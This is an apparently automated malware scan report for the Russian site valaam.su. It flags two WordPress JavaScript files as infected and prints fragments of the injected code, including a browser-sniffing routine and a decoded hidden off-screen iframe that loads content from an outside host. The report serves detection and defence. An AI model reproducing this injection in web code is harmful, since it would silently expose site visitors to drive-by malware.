Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=valaam.su
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.valaam.su/ | 200 OK Content-Length: 25070 Content-Type: text/html | clean |
http://www.valaam.su/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 94557 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, Antivirus reports:
| ||
http://www.valaam.su/wp-content/plugins/wp-polls/polls-js.dev.js | 200 OK Content-Length: 6529 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, jQuery('#polls-' + poll_id).replaceWith(data); if(pollsL10n.show_loading) { jQuery('#polls-' + poll_id + '-loading').hide(); } if(pollsL10n.show_fading) { jQuery('#polls-' + poll_id).fadeTo('def', 1, function () { set_is_being_voted(false); }); } else { set_is_being_voted(false); } } function set_is_being_voted(voted_status) { is_being_voted = voted_status; } Decoded script: <iframe src="http://dokisjam.tdl-informatica.com.ar/cracker15.ficvali" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.valaam.su/category/vesti/ | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://www.valaam.su/category/history/ | 200 OK Content-Length: 13869 Content-Type: text/html | clean |
http://www.valaam.su/category/sights/ | 200 OK Content-Length: 12404 Content-Type: text/html | clean |
http://www.valaam.su/category/photo/ | 200 OK Content-Length: 20563 Content-Type: text/html | clean |
http://www.valaam.su/valaam_map/ | 200 OK Content-Length: 12388 Content-Type: text/html | clean |
http://www.valaam.su/advice/ | 200 OK Content-Length: 17217 Content-Type: text/html | clean |
http://www.valaam.su/history/4/ | 200 OK Content-Length: 17466 Content-Type: text/html | clean |
http://www.valaam.su/history/5/ | 200 OK Content-Length: 20182 Content-Type: text/html | clean |
http://www.valaam.su/history/6/ | 200 OK Content-Length: 21984 Content-Type: text/html | clean |
http://www.valaam.su/history/7/ | 200 OK Content-Length: 23405 Content-Type: text/html | clean |
http://www.valaam.su/history/8/ | 200 OK Content-Length: 15075 Content-Type: text/html | clean |
http://www.valaam.su/history/9/ | 200 OK Content-Length: 14256 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: valaam.su
Result:
GET / HTTP/1.1
Host: valaam.su
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: valaam.su
Referer: http://www.google.com/search?q=valaam.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: valaam.su
Referer: http://www.google.com/search?q=valaam.su
Result:
The result is similar to the first query. There are no suspicious redirects found.